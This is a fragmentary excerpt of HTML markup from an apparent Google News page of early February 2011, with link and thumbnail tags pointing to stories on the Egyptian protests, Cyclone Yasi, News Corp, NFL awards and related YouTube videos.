<span><a target="_blank" class="usg-AFQjCNF0lE16nEnqB4E0ERh8cxeR64kDOQ " href="http://www.time.com/time/specials/packages/article/0,28804,2045328_2045333_2045792,00.html" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGQNsscPZNWpi1RUqGJTwPNiIJe1Q " href="http://feeds.nytimes.com/click.phdo?i=78b8739f1bb1a3541552c8f5eeb0061a" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHb_Eq1vB5idb8bu3Pg16lLrklzXg " href="http://www.latimes.com/news/nationworld/world/la-fg-yemen-president-20110203,0,4058776.story?track=rss" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEjTgQfEe-ucfSHIlf38Cv9cG6vJQ " href="http://www.reuters.com/article/2011/02/02/us-yemen-saleh-idUSTRE7113R820110202" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/finance/newsbysector/mediatechnologyandtelecoms/media/8299891/Potential-buyers-circle-Newscorps-MySpace.html" class="usg-AFQjCNEllCVDNPKUG4B9Ar4HkkxV1cCiuw " title="Telegraph.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/CCeCYSdmwSNsgM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/finance/newsbysector/mediatechnologyandtelecoms/media/8299891/Potential-buyers-circle-Newscorps-MySpace.html" class="usg-AFQjCNEllCVDNPKUG4B9Ar4HkkxV1cCiuw "> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGMQcxWAfbnjsADd3THeqya5MEM-w " href="http://online.wsj.com/article/BT-CO-20110202-718210.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/Technology/wireStory?id=12826505" target="_blank" class="usg-AFQjCNHbBDQX1zjfRt87_uEs3Av1KV2b5w " id="MAA4AEgQUAFgAmoCdXM">Ad Sales, Lower Costs Lift News Corp.&#39;s 2Q Profit</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.telegraph.co.uk/finance/newsbysector/mediatechnologyandtelecoms/media/8299891/Potential-buyers-circle-Newscorps-MySpace.html" target="_blank" class="usg-AFQjCNEllCVDNPKUG4B9Ar4HkkxV1cCiuw " id="MAA4AEgQUAJgAmoCdXM">Potential buyers circle Newscorp&#39;s MySpace</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHuO142ARwuQCUxTzsZMsJRrSBkMw " href="http://www.tvnewscheck.com/article/2011/02/02/48850/news-corp-tv-revenue-up-20" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEYjjqFVZUzpH-XWy8Y910Ay7ucaw " href="http://www.electronista.com/articles/11/02/02/news.corp.says.myspace.best.sold.off/" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/feb/02/cyclone-yasi-sugar-prices-record-high" class="usg-AFQjCNFORW2KUTW4SMY0S08ieTJ_RXWmGw " title="The Guardian"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/YmwDProUGLjDfM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/feb/02/cyclone-yasi-sugar-prices-record-high" class="usg-AFQjCNFORW2KUTW4SMY0S08ieTJ_RXWmGw "> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE5DvwQ-1u_c_-Ot5ZI1RR2iluS5Q " href="http://www.reuters.com/article/2011/02/02/australia-cyclone-sugar-idUSSDY2DE78W20110202" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=FX-3YERElcg">Video:&nbsp;
Cyclone Yasi hits Australia
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.abc.net.au/news/stories/2011/02/03/3128710.htm?site=melbourne" target="_blank" class="usg-AFQjCNHNCPu-z-iRr4oQwZGp_Y36EWtQnQ " id="MAA4AEgRUAFgAmoCdXM">Monster cyclone smashes coastal towns</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEmJniiPjTfV5hyGIbhR1LT_My6Ag " href="http://www.theaustralian.com.au/business/mining-energy/coalfields-escape-worst-of-cyclone-yasi-cba-analysts/story-e6frg9df-1225999319062" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF5cRpEpl51caVAFGpemXk1j4T5Ew " href="http://www.smh.com.au/environment/weather/in-the-eerie-still-of-yasis-giant-eye-20110203-1aedu.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEAu6WF7cBL6-pZuKS-sSh09cQDkQ " href="http://www.voanews.com/english/news/asia/Massive-Cyclone-Nearing-Landfall-in-Australia---115089974.html" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG7DkWUVwg-QtJ7zPRSNO96tSBuFA " href="http://www.businessweek.com/news/2011-02-02/australian-dollar-holds-losses-as-cyclone-yasi-hits-coastline.html" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://content.usatoday.com/communities/thehuddle/post/2011/02/roger-goodell-felt-deceived-by-bill-belichick-after-spygate/1" class="usg-AFQjCNGg3mNjLIOQyJAA2eifQe_IUTglBg " title="USA Today"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/m3SzKoNRbJvHFM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/thehuddle/post/2011/02/roger-goodell-felt-deceived-by-bill-belichick-after-spygate/1" class="usg-AFQjCNGg3mNjLIOQyJAA2eifQe_IUTglBg "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGAggYiSmWSN6Vx-Hj8aQV7EMUhjA " href="http://content.usatoday.com/communities/thehuddle/post/2011/02/patriots-bill-belichick-named-nfls-coach-of-the-year/1" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.boston.com/sports/football/patriots/extra_points/2011/02/belichick_wins.html" target="_blank" class="usg-AFQjCNGtiv5Fc-stU-whWj6Vt2VTxEZQLA " id="MAA4AEgSUAFgAmoCdXM">Belichick wins third AP coach of year award</a>
...[SNIP]...
<div class="aa-inner"><a href="http://nbcsports.msnbc.com/id/41397544/ns/sports-player_news/" target="_blank" class="usg-AFQjCNFeg3RVVK4jGoa6YHESCC5G1bDpHw " id="MAA4AEgSUAJgAmoCdXM">Bill Belichick named NFL Coach of the Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHKhCiXuS2zSC-lGR-2fifpwjjoPw " href="http://www.nfl.com/news/story/09000d5d81e139ee/article/patriots-belichick-is-ap-nfl-coach-of-the-year-for-third-time?module=HP_headlines" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEtlc_lnxIxs6ypjjw9bGxkMfCl5g " href="http://www.patriots.com/news/index.cfm?ac=latestnewsdetail&amp;pid=47522&amp;pcid=47" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFl4DHj9TBVPngq7cli0KblYvnjJQ " href="http://www.bnd.com/2011/02/02/1576283/belichick-wins-3rd-coach-of-year.html" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/commentisfree/2011/feb/02/egypt-protests-mubarak" class="usg-AFQjCNGXeTUZ0EaWikHvO_LNCp2Yo7qICg " title="The Guardian"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/yiyRqhVboKHu_M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/commentisfree/2011/feb/02/egypt-protests-mubarak" class="usg-AFQjCNGXeTUZ0EaWikHvO_LNCp2Yo7qICg "> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEbhrQMvzos4eEhKfPtQ08XeKGc9g " href="http://www.businessweek.com/news/2011-02-02/u-s-interests-in-peril-as-youth-rebel-leaders-quit-in-mideast.html" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.sfgate.com/cgi-bin/article.cgi?f=%2Fg%2Fa%2F2011%2F02%2F02%2Fbloomberg1376-LFYZYV1A1I4H01-2AUC95EAAS9AVUB8FBOBQSR3RE.DTL" target="_blank" class="usg-AFQjCNF91mmAR_pwRdz1tE7-SkIVAHXVPg " id="MAA4AEgTUAFgAmoCdXM">U.S. Interests in Peril as Youth Rebel, Leaders Quit in Mideast</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.voanews.com/english/news/middle-east/Israel-Concerned-Egypt-Upheaval-Could-Radicalize-Arab-Neighbors-115126899.html" target="_blank" class="usg-AFQjCNF-7FvhdFq-4LHRKo_gqHfGfGbXtg " id="MAA4AEgTUAJgAmoCdXM">Israel Concerned Egypt Upheaval Could Radicalize Arab Neighbors</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFAXc5RgnCIkOeR681yvnBp6ArE_w " href="http://www.cnn.com/2011/POLITICS/02/02/sweep.us.egypt/" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEDWjQZS_toogUhO8fXfZK7Uw2mtw " href="http://www.foxnews.com/world/2011/02/02/mideast-time-numbers-despots-sides/" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFbH3Asx3CB9CsRTfRBIOkb-CE68Q " href="http://www.guardian.co.uk/commentisfree/2011/feb/02/forces-unleashed-egypt-cant-turned-back" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGOynto1qxCEcQfo-veChDPeAnSHw " href="http://online.wsj.com/article/SB10001424052748704775604576120380692454302.html" id="MAA4AEgTUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.politico.com/news/stories/0111/48386.html" class="usg-AFQjCNHIUCLH2hXCqWUVyJvrMOS-bAcbJg " title="Politico"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/A5RuZEy9zKjtZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.politico.com/news/stories/0111/48386.html" class="usg-AFQjCNHIUCLH2hXCqWUVyJvrMOS-bAcbJg "> Politico </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHHiMOffsG_BjELcSthEPLu0aQmYg " href="http://www.examiner.com/david-letterman-in-national/mitt-romney-makes-presidential-aspirations-clear-to-david-letterman" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://tpmdc.talkingpointsmemo.com/mitt-romney/2011/02/" target="_blank" class="usg-AFQjCNGG9vwWJI1gXZBqOHwuM34P8_ckEg " id="MAA4AEgUUAFgAmoCdXM">Mitt Romney</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.politico.com/news/stories/0211/48701.html" target="_blank" class="usg-AFQjCNFkKSL-QD-Hs6jWKE3spbD4AqUvFA " id="MAA4AEgUUAJgAmoCdXM">Obama topping Palin in Red Arizona</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEsnce2tWf7gsZUHL01LlX7hM32PA " href="http://abcnews.go.com/Politics/egypt-protests-obama-response-draws-criticism-gop-presidential/story?id=12821036" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF3WCgEZ6nH6BjMXq_O2-oM9IEJJA " href="http://www.cnn.com/2011/POLITICS/02/01/gop.2012/" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF-UokptXxbWNsz3tab6b-T5Grutg " href="http://blogs.desmoinesregister.com/dmr/index.php/2011/02/02/romney-2012-campaign-will-take-me-to-iowa/" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGWMyBCuNOEquEdx_VaC4xVLpHzJA " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/01/AR2011020105755.html" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/feb/02/elbaradei-abandon-mubarak" class="usg-AFQjCNFJfWgJxQZyplL23z7XWnjHNzFziQ " title="The Guardian"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/LnMcIHYSeOQ8JM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/feb/02/elbaradei-abandon-mubarak" class="usg-AFQjCNFJfWgJxQZyplL23z7XWnjHNzFziQ "> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNErDmwdn-G8hUOtvf4jJh44YJyl6Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205375.html" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=upPFJSbiQnA">Video:&nbsp;
Egypt : Who is the Muslim Brotherhood?
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/stories/2011/02/02/eveningnews/main7311629.shtml" target="_blank" class="usg-AFQjCNFYgZbC1QXceJHOhZf_mVMXr__JyQ " id="MAA4AEgVUAFgAmoCdXM">ElBaradei: Mubarak Needs to &#39;Let Go&#39;</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGT9Hi6IYutm9nLae-_tWqZUIWhxw " href="http://www.voanews.com/english/news/middle-east/Former-Egyptian-Diplomat-ElBaradei-Face-of-Opposition-to-President-Mubarak-115126994.html" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHp_5O8bbFoE0h9Sv3o3b-aieDuGw " href="http://www.thestar.com/news/world/article/932420--who-s-afraid-of-the-muslim-brotherhood" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEBjXcgmSb3mfIZTjxnKTuIMTFKAA " href="http://www.telegraph.co.uk/news/worldnews/africaandindianocean/egypt/8299270/Egypt-crisis-Mohamed-ElBaradei-says-he-will-run-for-presidency.html" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.latimes.com/sports/la-sp-erskine-20110203,0,1515176.column" class="usg-AFQjCNGB16BOkb97Gf9ztb2iUGXfS1yv-g " title="Los Angeles Times"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/pygmnQGghbsFLM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/sports/la-sp-erskine-20110203,0,1515176.column" class="usg-AFQjCNGB16BOkb97Gf9ztb2iUGXfS1yv-g "> Los Angeles... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFijI3sQkj71rnvLy82ExfgJzQrKw " href="http://www.nfl.com/superbowl/story/09000d5d81e143c6/article/family-business-matthews-sees-genes-as-blessing-motivator" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/thehuddle/post/2011/02/clay-matthews-says-packers-plan-on-razzing-ir-players-upon-arrival-in-dallas/1" target="_blank" class="usg-AFQjCNFJgd44KXzSH5G7d1UBzdQbxXtSHQ " id="MAA4AEgWUAFgAmoCdXM">Clay Matthews says Packers plan on razzing IR players upon arrival in Dallas</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/sports/la-sp-erskine-20110203,0,1515176.column" target="_blank" class="usg-AFQjCNGB16BOkb97Gf9ztb2iUGXfS1yv-g " id="MAA4AEgWUAJgAmoCdXM">Hair stylists on Troy Polamalu, Clay Matthews: Have a scrunchy with that scrimmage</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHP3Jg8IawYOkXk4WjZolwxNtLVAw " href="http://www.cbssports.com/nfl/story/14636147/nfl-awards" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHYFSFGlLxCq9TIDqVZC5_AtO6C9A " href="http://sports.espn.go.com/espn/page2/story?page=caple/110201_troy_polamalu_clay_matthews&amp;sportCat=nfl" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEy7yOIZDIc_vCtffgIWXxbec-a9Q " href="http://nfl.fanhouse.com/2011/02/02/clay-matthews-is-head-and-shoulders-above-polamalu-when-it-comes-t/" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFQ9ZG9_xoqB2SfWnaX4vFSmZSaPw " href="http://www.latimes.com/lat-anderson-cooper-attacked-itn-sl,1,1995164.storylink" id="7917548309890936910"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFUarlxAJbp8xGb9XvZ1s9GgM6JlA " href="http://www.latimes.com/news/nationworld/nation/la-na-winter-storm-20110203,0,6658372.story" id="-5890648846845520135"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEIz-kAVzfKwsro4stJBj25zg7FUw " href="http://www.reuters.com/article/2011/02/03/us-usa-healthcare-congress-idUSTRE70O62D20110203" id="7972365476035665175"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFxuNFy1USPP8THyOtmX5L1acIOCQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205172.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHywKYaWAN307i5PyFVHpvNwbkEUA " href="http://blog.washingtonpost.com/clicktrack/2011/02/in_concert_robert_plant_and_th.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNG-XE0s4f76impU6ECib_rPaYlMjw " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/02/02/AR2011020205536.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGIwL-FUk4v3jDBe3cpGaeV4n-o_A " href="http://www.cnn.com/2011/POLITICS/02/02/senate.health.care/?hpt=T2" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHsBp4zUK0mcR4yk_mn8tLhlc5hAA " href="http://seekingalpha.com/article/249509-28-dividend-stocks-acting-like-a-money-machine" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGaLms60FTN3d6UQz9eISwDQZe-6g " href="http://www.examiner.com/exopolitics-in-seattle/extraterrestrials-now-live-among-us-china-and-u-s-a-newspapers-report" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH16OsYtSQVPkXYEi6TKeczr3VPOg " href="http://www.wired.com/threatlevel/2011/02/wikileaks-sweden/" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFbJ8kOxiwkMCTn-jNGKcQkU9OErA " href="http://bleacherreport.com/articles/587581-erin-andrews-50-hottest-pics-of-the-sports-reporter" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFdZhS86HuhK2ZQzvYcDxr79fjPoQ " href="http://newyork.cbslocal.com/2011/01/25/green-lantern-chewed-up-and-spit-out-in-pittsburgh/" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFzW7m6_eEOv0YlZOijO4Tt3whi-Q " href="http://www.miaminewtimes.com/2011-01-27/news/cops-vs-cameras-filming-cops-illegal/" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGFJSwbZqgVmHeK09hoU4Lhtbkiyw " href="http://bleacherreport.com/articles/586029-the-50-most-horrifying-sights-in-sports" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEtvz_dNl565gvmlM5nv2QBHFW5_A " href="http://online.wsj.com/article/SB10001424052748703439504576116083514534672.html?mod=googlenews_wsj" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEqhQ-06gM-vfFULK4sATGLknBIfw " href="http://www.nytimes.com/2011/02/02/dining/reviews/02wine.html" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFM7N4bzne18_jnS33xVB6qdsaD2g " href="http://www.huffingtonpost.com/dr-mark-hyman/lower-cholesterol-naturally_b_815393.html" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGZ4TDhDepQDj81u0OsoNWymej1Ag " href="http://insidetv.ew.com/2011/01/30/sag-awards-2011-backstage/" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/axLrMqOAJ7U/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/axLrMqOAJ7U/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=axLrMqOAJ7U">Brady Hoke Interview</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=axLrMqOAJ7U">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/xcjJsg8AD2g/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/xcjJsg8AD2g/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=xcjJsg8AD2g">Raw Video: Dramatic New Mages of Cairo Violence</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=xcjJsg8AD2g">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/9iSGOUTz3QA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/9iSGOUTz3QA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=9iSGOUTz3QA">Empire State Building Run-Up: Race to the Top!</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=9iSGOUTz3QA">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/OyFbdZXH5gs/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/OyFbdZXH5gs/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=OyFbdZXH5gs">US student bypasses Egypt&#39;s web blackout</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=OyFbdZXH5gs">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/a22KhK1rxTc/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/a22KhK1rxTc/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=a22KhK1rxTc">Chicago Hunkers Down As Blizzard Blows In</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=a22KhK1rxTc">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFR8LPDLdGLzfM0NGtLZAclnO0thQ " href="http://www.rap-up.com/2011/02/02/drake-supports-justin-bieber-at-film-premiere-leads-juno-nominations/" id="863307935504292074"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHv9IHJ07AJGaoxREd39zOKV9Sxkg " href="http://www.huffingtonpost.com/2011/02/02/anderson-cooper-attacked-punched-egypt_n_817352.html" id="1856460484661458567"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHPUX0H1OWCu0NGT3T8oEoPgARBUg " href="http://mashable.com/2011/02/01/google-shopper-iphone/" id="4900611500979330761"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHuiVqL6DIb3KQtdO69u0gQTy5ddw " href="http://mashable.com/2011/02/02/internet-restored-egypt/" id="-1466661961739116300"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGbq88hCZ5ButJ8VQEW8HgqlJ0tAA " href="http://techcrunch.com/2011/02/01/bing-google-fight/" id="6500723793673162107"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGsWuudLGc89giih2I0S31KjpN7lw " href="http://news.blogs.cnn.com/2011/02/02/egypt-crisis-prepping-for-another-day-of-protests/" id="8025845920293655569"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFYmZoCfbFF83VFHaKDHzzCNNSiFQ " href="http://www.wired.com/dangerroom/2011/02/leading-egyptian-facebook-activist-arrested-friends-say/" id="7279390507080829291"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEDY2p1dV52sHNCoz-u0gU92yQlVQ " href="http://www.nytimes.com/2011/02/02/world/middleeast/02transition.html?src=twrhp" id="-3122123869888862834"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpcNid6QkpX7ikbMtIAfslICLP1Q " href="http://www.nytimes.com/2011/02/03/world/middleeast/03egypt.html?src=twrhp" id="974035099045410111"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE8WF9I_is2ZZ3o3yVtdQeKiGN06A " href="http://blogs.wsj.com/digits/2011/02/01/how-much-does-a-facebook-fan-cost-107/" id="-7831834876613665490"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2sLCkzb46FamCOb4ZMS00i_PyiA " href="http://www.artistdirect.com/entertainment-news/article/justin-bieber-s-never-say-never-to-change-music-films-forever/8692426" id="3075150691838224862"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFKY8jHlc6DyGJS6kYYSN3nWTWIcA " href="http://news.blogs.cnn.com/2011/01/28/clashes-erupt-in-cairo-elbaradei-told-to-stay-put-cnn-camera-confiscated/" id="-3267358328204419859"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEg2YQ-CnOIk7-f-z7Lru-oStXv_w " href="http://www.mtv.com/news/articles/1656968/justin-bieber-never-say-never-remixes.jhtml" id="7606504740284455591"><span class="titletext">
...[SNIP]...
